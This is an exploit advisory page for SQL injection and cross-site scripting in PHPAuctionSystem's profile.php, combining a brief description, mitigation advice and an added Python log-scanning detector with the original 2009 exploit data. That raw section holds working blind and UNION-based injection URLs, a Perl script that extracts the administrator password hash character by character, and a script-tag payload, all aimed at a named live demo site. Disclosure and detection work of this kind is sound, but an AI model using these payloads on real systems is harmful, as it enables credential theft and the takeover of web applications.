Vendor: PHPAuctionSystem
By: x0r
CVSS: 7.5 (HIGH)
Type: SQL Injection and XSS
CWE: 89, 79
Product Name: PHPAuctionSystem
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHPAuctionSystem

The vulnerability exists because user-supplied input in the 'user_id' and 'auction_id' parameters of the 'profile.php' script is not sufficiently sanitized. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database, and can also inject arbitrary web script or HTML into the vulnerable page. Successful exploitation may allow an attacker to gain access to sensitive information, modify data, execute arbitrary SQL commands and inject arbitrary web script or HTML.

Mitigation:

Validate user-supplied input before it reaches a SQL query to prevent SQL injection attacks. It is also recommended to use the latest version of the application.
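Every payload quoted in the raw data below has the same trait: a parameter that profile.php only expects as an integer ('user_id' or 'auction_id') arrives as something else. The following is an added detection example, not code from this advisory or from PHPAuctionSystem; it scans constructed Apache access-log lines for that condition and labels each hit with the payload shape seen on this page. The log lines, client IPs, regexes and labels are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# profile.php only ever expects these two parameters as integers, so anything else in them is an anomaly.
INT_PARAMS = ("user_id", "auction_id")
# Shapes of the payloads quoted on this page: boolean-blind probes on @@version,
# UNION SELECT extraction, and a <script> tag in auction_id (labels are informational only).
SQLI_RE = re.compile(r"union\b.*\bselect\b|substring\s*\(|@@version|\band\s+\d+\s*=\s*\d+|--", re.I)
XSS_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)
# Apache combined-log request line: client IP, timestamp, method, target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Constructed sample traffic (not captured from any real server); the ';' is percent-encoded so older parse_qs versions do not split on it.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jan/2009:10:00:01 +0000] "GET /demo/profile.php?user_id=29 HTTP/1.1" 200 5120
203.0.113.5 - - [05/Jan/2009:10:00:02 +0000] "GET /demo/profile.php?user_id=29%20and%20substring(@@version,1,1)=5-- HTTP/1.1" 200 5120
203.0.113.5 - - [05/Jan/2009:10:00:03 +0000] "GET /demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3%20from%20PHPAUCTION_adminusers-- HTTP/1.1" 200 6001
203.0.113.5 - - [05/Jan/2009:10:00:04 +0000] "GET /demo/profile.php?user_id=29&auction_id=9%3Cscript%3Ealert(1)%3B%3C/script%3E HTTP/1.1" 200 5200
198.51.100.7 - - [05/Jan/2009:10:00:05 +0000] "GET /demo/profile.php?user_id=29&auction_id=9 HTTP/1.1" 200 5200
"""

def classify_request(target):
    """Return (param, label, decoded_value) findings for one request target."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] != "profile.php":
        return []
    findings = []
    # parse_qs percent-decodes values and splits each pair on its first '=' only, so the blind probe survives as one value.
    query = parse_qs(parts.query, keep_blank_values=True)
    for name in INT_PARAMS:
        for value in query.get(name, []):
            if re.fullmatch(r"-?\d+", value):
                continue  # a plain integer is the only legitimate shape
            if SQLI_RE.search(value):
                label = "sqli"
            elif XSS_RE.search(value):
                label = "xss"
            else:
                label = "non-integer"
            findings.append((name, label, value))
    return findings

def scan_log(text):
    """Run classify_request over every parsable line; return (ip, param, label, value) alerts."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            for param, label, value in classify_request(m["target"]):
                alerts.append((m["ip"], param, label, value))
    return alerts
```

Running scan_log over SAMPLE_LOG yields three alerts, all from 203.0.113.5: two 'sqli' hits on user_id and one 'xss' hit on auction_id, while the two well-formed requests produce nothing.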

Exploit-DB raw data:

#########################
#PHPAuctionSystem#
#########################
Author: x0r
Email: andry2000@hotmail.it
Cms: PhpAuctionSystemvnew
Cmsprice: $59.99
Demo: http://www.phpauctions.info/demo/
##########################

BugIn: \profile.php (Blind\Normal Sql Injection)

Exploit (Blind):
profile.php?user_id=29%20and%20substring(@@version,1,1)=5--
profile.php?user_id=29%20and%20substring(@@version,1,1)=4--
profile.php?user_id=29and+1=0--
profile.php?user_id=29and+1=1--
Perl Exploit:

#!/usr/bin/perl -w
use strict;
use LWP::Simple;

my $a;
my $host = "http://www.phpauctions.info/demo/profile.php?user_id="; # Put the victim; I've used the demo
my @chars = (48..57, 97..102); # ASCII codes of '0'..'9' and 'a'..'f'

for my $i (1..32) {
    foreach my $ord (@chars) {
        $a = get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");
        if ($a =~ /coucou/i) { # put the username of the user_id=[id]
            syswrite(STDOUT, chr($ord));
            $i++;
            last;
        }
    }
}

Sql Injection:

profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--

Exploit (XSS): profile.php?user_id=29&auction_id=9[XssCode]

LiveDemo:
http://www.phpauctions.info/demo/profile.php?user_id=29and substring(@@version,1,1)=4-- [False]
http://www.phpauctions.info/demo/profile.php?user_id=29and substring(@@version,1,1)=5-- [True]

LiveDemo(XSS):

http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<script>alert(1);</script>

Live Demo Sql:

http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--


Greetz:MyGirlfriend...

# milw0rm.com [2009-01-05]